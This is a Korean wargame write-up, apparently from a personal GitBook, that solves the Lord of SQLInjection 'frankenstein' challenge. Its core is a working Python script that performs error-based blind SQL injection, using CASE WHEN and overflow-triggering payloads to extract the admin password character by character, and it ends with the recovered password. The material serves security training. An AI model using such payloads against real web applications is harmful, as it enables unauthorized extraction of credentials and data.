📂
이동현 Donghyun Lee
  • Welcome!
  • Wargame
    • Webhacking.kr
      • old-01 (200)
      • old-02 (500)
      • old-03 (350)
      • old-04 (300)
      • old-05 (300)
      • old-06 (100)
      • old-07 (300)
      • old-08 (350)
      • old-09 (900)
      • old-10 (250)
      • old-11 (300)
      • old-12 (250)
      • old-13 (1000)
      • old-14 (100)
      • old-15 (50)
      • old-16 (100)
      • old-17 (100)
      • old-18 (100)
      • old-19 (150)
      • old-20 (200)
      • old-21 (250)
      • old-22 (500)
      • old-23 (200)
      • old-24 (100)
      • old-25 (150)
      • old-26 (100)
      • old-27 (150)
      • old-28 (500)
      • old-29 (400)
      • old-30 (350) : UNSOLVED
      • old-31 (150)
      • old-32 (150)
      • old-33 (200)
      • old-34 (400)
      • old-35 (350)
      • old-36 (200)
      • old-38 (100)
      • old-39 (100)
      • old-40 (500)
      • old-41 (250)
      • old-42 (200)
      • old-43 (250)
      • old-44 (500)
      • old-45 (550)
      • old-46 (300)
      • old-47 (150)
      • old-48 (350)
      • old-49 (300)
      • old-50 (450)
      • old-51 (250)
      • old-52 (400)
      • old-53 (350)
      • old-54 (100)
      • old-55 (400)
      • old-56 (250)
      • old-57 (600)
      • old-58 (150)
      • old-59 (200)
      • old-60 (300)
      • old-61 (200)
    • Lord of SQLInjection
      • gremlin
      • cobolt
      • goblin
      • orc
      • wolfman
      • darkelf
      • orge
      • troll
      • vampire
      • skeleton
      • golem
      • darkknight
      • bugbear
      • giant
      • assassin
      • succubus
      • zombie_assassin
      • nightmare
      • xavis
      • dragon
      • iron_golem
      • dark_eyes
      • hell_fire
      • evil_wizard
      • green_dragon
      • red_dragon
      • blue_dragon
      • frankenstein
      • phantom
      • ouroboros
      • zombie
      • alien
      • cthulhu
      • death
      • godzilla
      • cyclops
      • chupacabra
      • manticore
      • banshee
      • poltergeist
      • nessie
      • revenant
      • yeti
      • mummy
      • kraken
      • cerberus
      • siren
      • incubus
    • Pwnable.kr
      • Toddler's Bottle
        • fd - 1 pt
        • collision - 3 pt
        • bof - 5 pt
        • flag - 7 pt
        • passcode - 10 pt
  • CTF
    • AlexCTF 2017
      • [Crypto] CR3: What is this encryption?
      • [Crypto] CR4: Poor RSA
    • BSides San Francisco CTF 2017
      • [Crypto] []root
  • project
    • How to Find Container Platform Escape Bug
      • Docker
        • Install Docker
        • Run Container
        • Docker Basic Commands
        • Docker Compose
        • Build Docker Image
        • Docker Hub
        • Private Docker Registry
      • Kubernetes
        • Introduction to Kubernetes
        • Kubernetes Practice
      • PoC
  • Donghyun's Lifelog
Powered by GitBook
On this page

Was this helpful?

  1. Wargame
  2. Lord of SQLInjection

frankenstein

Previousblue_dragonNextphantom

Last updated 5 years ago

Was this helpful?

첫 화면이다.

Error-based Blind SQL Injection 문제로 인지하고 풀었다.

파이썬 코드를 짜면 아래와 같다.

import requests
import string

URL = 'https://los.rubiya.kr/chall/frankenstein_b5bab23e64777e1756174ad33f14b5db.php?pw='
PHPSESSID = 'MY_PHPSESSID'
TRUE_PHRASE = '<br>error'


def query(payload):
    cookies = {'PHPSESSID': PHPSESSID}
    r = requests.get(URL + payload, cookies=cookies)
    content = r.text
    return TRUE_PHRASE in content


# 0dc4efbb
def find_pw():
    pw = ''
    while True:
        found = False
        for character in string.printable:
            if character in "#%&'_":
                continue
            elif query("' or case when id='admin' and pw like '{}{}%25' then 9999999999*9999999999 else 0 end%23".format(pw, character)) is True:
                pw += character
                found = True
                break
        if found is False:
            break
    print('pw: {}'.format(pw))


find_pw()

실행결과, pw는 0dc4efbb 이다.

https://los.rubiya.kr/chall/frankenstein_b5bab23e64777e1756174ad33f14b5db.php?pw=0dc4efbb 에 접속하면 문제가 풀린다.